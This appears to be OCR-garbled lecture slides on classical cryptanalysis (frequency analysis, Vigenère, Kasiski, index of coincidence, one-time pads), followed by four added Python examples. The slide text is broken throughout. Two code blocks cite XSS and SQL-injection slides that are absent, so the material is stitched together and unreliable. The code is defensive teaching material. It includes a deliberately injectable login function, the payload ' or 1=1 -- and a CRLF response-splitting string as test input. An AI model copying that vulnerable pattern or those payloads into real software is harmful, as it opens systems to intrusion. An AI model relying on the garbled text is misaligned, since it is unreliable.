zdancewibfgh Plaintext he lied Ciphertext ic hbcn 3909 CISTCOM 551 Cryptanalysis of Monoalphabetic Ciphers Brute force attack try every key N Possible keys for Nletter alphabet 26 z 4 x1026 possible keys Try 1 key per usec 10 trillion years but i monoalphabetic Ciphers are easy to solve Onetoone mapping of letters is bad Frequency distributions of common letters 3909 CISTCOM 551 Order amp Frequency of Single Letters B 162 L 403 E 1231 959 D 365 G 161 A 805 C 320 V 093 T 794 U 310 K 052 719 P 229 Q 020 718 F 228 X 020 659 M 225 J 010 R 603 W 203 H 514 O N I S Z 009 Y 188 10 CISTCOM 551 3909 Monoalphabetic Cryptanalysis Count the occurrences of each letter in the cipher text Match against the statistics of English Most frequent letter likely to be e 2nol most frequent likely to be t etc Longer ciphertext makes statistical analysis more likely to work 3909 CISTCOM 551 11 Digrams and Trigrams Diagrams in frequency order for English TH HE AN IN ER RE ES ON EA T AT ST EN ND OR Trigrams in frequency order for English THE AND THA ENT ION TO FOR NDE HAS NCE EDT TIS OFT STH MEN 12 Desired Statistics Problems with monoalphabetic ciphers Frequency of letters in ciphertext reflects frequency of plaintext Want a single plaintext letter to map to multiple ciphertext letters ell gt XH C W Ideally ciphertext frequencies should be flat 3909 CISTCOM 551 13 Vigenere Tableau Multiple substitutions Can choose complimentary ciphers so that the frequency distribution flattens out More generally more substitutions means flatter distribution Vigenere Tableau Invented by Blaise de Vigenere forthe court of Henry III of France c 1500 s Collection of 26 permutations Usually thought of as a 26 x 26 grid Key is a word 14 Vigenere Tableau a b c d e f g A a b c d e f g B b c d e f g h C c d e f g h i D d e f g h 1 j E e f g h i j k Plaintext a bad deed Key bed B EDB EDBE Ciphertext b fde hgfh 15 Polyalphabetic Substitutions Pick k substitution ciphers Encrypt the message by rotating through the k 
substitutions m e S S a g e 31m 7529 7535 7543 7513 7529 7539 q a x o a u v Same letter can be mapped to multiple different ciphertexts Helps smooth out the frequency distributions Diffusion 3909 CISTCOM 551 16 Cracking Polyalphabetic Substitutions SEp1 Try to identify the number of substitutions used For example guess the length of the word used as a key in the Vigenere tableau SEpZ Use frequency information to crack each of the subsitutions as though it was a monoalphabetic cipher 3909 CISTCOM 551 17 Kasiski Method Identify key length of polyalphabetic ciphers If pattern appears k times and key length is n then it will be encoded kn times by the same key 1 Identify repeated patterns of 2 3 chars 2 For each pattern Compute the differences between starting points of successive instances Determine the factors of those differences 3 Key length is likely to be one of the frequently occurring factors 18 Cryptanalysis Continued Once key length is guessed to be k Split ciphertext into k slices Single letter frequency distribution for each slice should resemble English distribution How do we tell whether a particular distribution is a good match for another Let proboc be the probability for letter or In a perfectly flat distribution proboc 126 00384 19 Variance Measure of roughness Measure distance from flat dist OL Z Var 2 proboc 1262 or a OLZ 2 proboc2 126 oca 3909 CISTCOM 551 20 Estimate Variance From Frequency proboc2 is probability that any two characters drawn from the text will be or Suppose there are n ciphertext letters total Suppose freqoc is the frequency of or What is likelihood of picking or twice at random freqoc ways of picking the first or freqoc 1 ways of picking the second or But this counts twice because oc Bo So fredd x fredoc 1 2 21 Index of Coincidence Butthere are pairs ofletters freqoc x freqd 1 n x n1 so probd is roughly Index of coincidence approximates variance from frequencies 0 Z freqd x freqd 1 39C Z nx n1 13 22 What s it good for If the 
distribution is flat then IC a 00384 Ifthe distribution is like English then IC as 0068 Can verify key length keylen 1 2 3 4 5 IC 0068 0052 0047 0044 0044 many 0038 23 Summary Cracking Polyalphabetics Use Kasiski method to guess likely key lengths Compute the Index of Coincidence to verify key length k kSlices should have IC similar to English Note digram information harder to use for polyalphabetic ciphers May want to consider split digrams Example if tion is a common sequence k2 then to and in are likely split digrams 24 Perfect Substitution Ciphers D192 93 pn 9 b1 b2 b3 bn c1c2 c3 cn Choose a string of random bits the same length as the plaintext XOR them to obtain the ciphertext Perfect Secrecy Probability that a given message is encoded in the ciphertext is unaltered by knowledge of the ciphertext Proof Give me any plaintext message and any ciphertext and I can construct a key that will produce the ciphertext from the plaintext 3909 CISTCOM 551 25 Onetime Pads Another name for Perfect Substitution Actually used by US agents in Russia Physical pad of paper List of random numbers Pages were torn out and destroyed after use Numbers Stations Vernam Cipher Used by ATampT Random sequence stored on punch tape Not practical for general purpose crypography But useful as component in other protocols 3909 CISTCOM 551 26 Problems with Perfect Substitution Key is the same length as the plaintext Sender and receiver must agree on the same random sequence Not any easier to transmit key securely than to transmit plaintext securely Need to be able to generate many truly random bits Pseudorandom numbers generated by an algorithm aren t good enough for long messages Must be careful Remember the RC4 algorithm from WEP Can t reuse the key Not enough confusion 3909 CISTCOM 551 27 Diffusion and Confusion Diffusion Ciphertext should look random Protection against statistical attacks Monoalphabetic gt Polyalphabetic substitution diffusion increases Confusion Make the relation between 
the key plaintext and ciphertext complex Lots off confusion gt hard to calculate key in a known plaintext attack Polyalphabetic substitution little confusion 3909 CISTCOM 551 28 Computational Security Perfect Ciphers are unconditionally secure No amount of computation will help crack the cipher ie the only strategy is brute force In practice strive for computationally security Given enough power the attacker could crack the cipher example brute force attack But an attacker with only bounded resources is extremely unlikely to crack it Example Assume attacker has only polynomial time then encryption algorithm that can t be inverted in less than exponential time is secure Results are usually stated probabilistically 3909 CISTCOM 551 29 Kinds of Industrial Strength Crypto Shared Key Cryptography Public Key Cryptography Cryptographic Hashes All of these aim for computational security Not all methods have been proved to be intractable to crack 3909 CISTCOM 551 30 Shared Key Cryptography Sender amp receiver use the same key Key must remain private Also called symmetric or secret key cryptography Often are blockciphers Process plaintext data in blocks Examples DES TripleDES Blowfish Twofish AES Rijndael 3909 CISTCOM 551 31 Shared Key Notation Encryption algorithm E key x plain a cipher Notation Kmsg EK msg Decryption algorithm D key x cipher a plain D inverts E DK EK msg msg Use capital K for shared secret keys Sometimes E is the same algorithm as D 3909 CISTCOM 551 32
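The "Avoiding XSS bugs" and "HTTP Response Splitting" slides above both come down to encoding user input for the context it is echoed into. The following is an added example, not code from the lecture, written in Python rather than PHP/JSP: `escape_for_html` plays the role of `htmlspecialchars(..., ENT_QUOTES)`, and `redirect_location` is an assumed helper for the `by_lang.jsp` redirect that refuses CR/LF before building the header.

```python
import html
from urllib.parse import quote

def escape_for_html(s):
    """Same contract as PHP htmlspecialchars($s, ENT_QUOTES) and ASP.NET
    Server.HtmlEncode: & < > " ' become entities, so user text echoed into a page
    can neither open a tag nor close the attribute it sits in.
    (Python writes the apostrophe as &#x27; where PHP writes &#039;.)"""
    return html.escape(s, quote=True)

def redirect_location(lang):
    """Location header value for the slides' by_lang.jsp redirect (assumed helper).
    A CR or LF inside the parameter would terminate the header and let the rest
    of the value be parsed as a second, attacker-supplied response, so reject it."""
    if "\r" in lang or "\n" in lang:
        raise ValueError("CR/LF in redirect parameter")
    # Percent-encoding is the second line of defence: %0D%0A is plain text to
    # every HTTP parser and proxy cache on the path.
    return "Location: by_lang.jsp?lang=" + quote(lang, safe="")

if __name__ == "__main__":   # constructed inputs
    print(escape_for_html("<a href='test'>Test</a>"))
    print(redirect_location("french"))
    try:
        redirect_location("french\r\nContent-length: 0\r\n\r\nHTTP/1.1 200 OK")
    except ValueError as e:
        print("rejected:", e)
```

Rejecting rather than silently encoding the split attempt gives the server a loggable event, which is what a detection rule for response splitting keys on.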
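The ASP login page and its parameterized replacement from the SQL injection slides, reproduced side by side as an added example (not the lecture's code) in Python with an in-memory sqlite3 table standing in for `UserTable`; the bad input is the slide's `' or 1=1 --`.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the slides' UserTable."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE UserTable (username TEXT, password TEXT)")
    db.execute("INSERT INTO UserTable VALUES ('alice', 'correct horse')")
    return db

def login_vulnerable(db, user, pwd):
    """The ASP page's logic: query text glued together from the form fields.
    Returns True when a row comes back, i.e. the slide's 'not ok.EOF'."""
    sql = ("SELECT * FROM UserTable WHERE username='" + user +
           "' AND password='" + pwd + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, user, pwd):
    """The fix from 'Avoiding SQL injection', in sqlite3's ? placeholder form:
    the values travel separately from the SQL text, so a quote or -- inside
    them is data, never syntax."""
    sql = "SELECT * FROM UserTable WHERE username=? AND password=?"
    return db.execute(sql, (user, pwd)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    bad_user = "' or 1=1 --"   # the slide's bad input
    print("vulnerable, real creds  :", login_vulnerable(db, "alice", "correct horse"))
    print("vulnerable, bad input   :", login_vulnerable(db, bad_user, "anything"))
    print("parameterized, bad input:", login_parameterized(db, bad_user, "anything"))
    print("parameterized, real     :", login_parameterized(db, "alice", "correct horse"))
```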
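The Vigenère tableau, the Kasiski method and the Index of Coincidence from the slides above, carried through in code as an added example (not the lecture's own): `vigenere` reproduces the "a bad deed" / "bed" example, `index_of_coincidence` is the slides' IC formula, `mean_slice_ic` scores a candidate key length k by the average IC of its k slices, and `kasiski_distances` collects the distances between repeated trigrams. The English sample text in the demo is constructed.

```python
from collections import Counter
from itertools import combinations
import string

ALPHA = string.ascii_lowercase

def vigenere(text, key, decrypt=False):
    """Rotate through the key's shifts letter by letter; non-letters pass through
    without consuming a key position (the slide's 'a bad deed' / 'bed' example)."""
    out, i = [], 0
    for ch in text.lower():
        if ch not in ALPHA:
            out.append(ch)
            continue
        shift = ALPHA.index(key[i % len(key)].lower())
        out.append(ALPHA[(ALPHA.index(ch) + (-shift if decrypt else shift)) % 26])
        i += 1
    return "".join(out)

def letters(text):
    return "".join(c for c in text.lower() if c in ALPHA)

def index_of_coincidence(text):
    """IC = sum freq(a)(freq(a)-1) / (n(n-1)); about 0.038 if flat, 0.068 for English."""
    ls = letters(text)
    n = len(ls)
    return 0.0 if n < 2 else sum(f * (f - 1) for f in Counter(ls).values()) / (n * (n - 1))

def mean_slice_ic(text, k):
    """Average IC of the k slices (every k-th letter); highest at the true key length."""
    ls = letters(text)
    return sum(index_of_coincidence(ls[i::k]) for i in range(k)) / k

def kasiski_distances(text, size=3):
    """Distances between repeats of each size-letter pattern; the key length divides
    most of them, so it shows up among the frequently occurring factors."""
    ls = letters(text)
    seen = {}
    for i in range(len(ls) - size + 1):
        seen.setdefault(ls[i:i + size], []).append(i)
    return sorted({b - a for pos in seen.values() for a, b in combinations(pos, 2)})

if __name__ == "__main__":
    print(vigenere("a bad deed", "bed"))   # b fde hgfh, as on the slide
    sample = ("the quick brown fox jumps over the lazy dog while the farmer counts "
              "the sheep and the cat watches the birds near the old barn by the river")  # constructed
    cipher = vigenere(sample, "bed")       # 3-letter key, so k=3 should score near 0.068
    for k in range(1, 7):
        print(k, round(mean_slice_ic(cipher, k), 3))
    print("repeat distances:", kasiski_distances(cipher))
```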
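The perfect substitution (one-time pad) slides above make two claims, that any plaintext can be explained by some key and that the key must never be reused. Both are checked in this added example (not the lecture's code); `key_explaining` and `pad_reuse_leak` are assumed names, and the messages are constructed.

```python
import secrets

def otp_encrypt(plain, key):
    """Perfect substitution: c_i = p_i XOR b_i with a key as long as the plaintext."""
    if len(key) != len(plain):
        raise ValueError("one-time pad key must be exactly as long as the plaintext")
    return bytes(p ^ k for p, k in zip(plain, key))

otp_decrypt = otp_encrypt   # XOR is its own inverse

def key_explaining(plain, cipher):
    """The slide's proof of perfect secrecy: for ANY plaintext of the right length
    there is a key mapping it to this ciphertext, so the ciphertext alone says
    nothing about which plaintext was sent. k = p XOR c."""
    return otp_encrypt(plain, cipher)

def pad_reuse_leak(c1, c2):
    """Why the pad must not be reused: two ciphertexts under the same pad XOR to
    p1 XOR p2, which no longer depends on the key at all."""
    return bytes(a ^ b for a, b in zip(c1, c2))

if __name__ == "__main__":
    msg = b"attack on thursday"
    pad = secrets.token_bytes(len(msg))      # fresh, truly random, used once
    c = otp_encrypt(msg, pad)
    assert otp_decrypt(c, pad) == msg
    # Any other 18-byte message is an equally valid explanation of c:
    alt = b"eat breakfast tmrw"
    assert otp_encrypt(alt, key_explaining(alt, c)) == c
    # Reusing the pad: p1 XOR p2 falls out without the key.
    c2 = otp_encrypt(alt, pad)
    assert pad_reuse_leak(c, c2) == pad_reuse_leak(msg, alt)
    print("one-time pad checks passed")
```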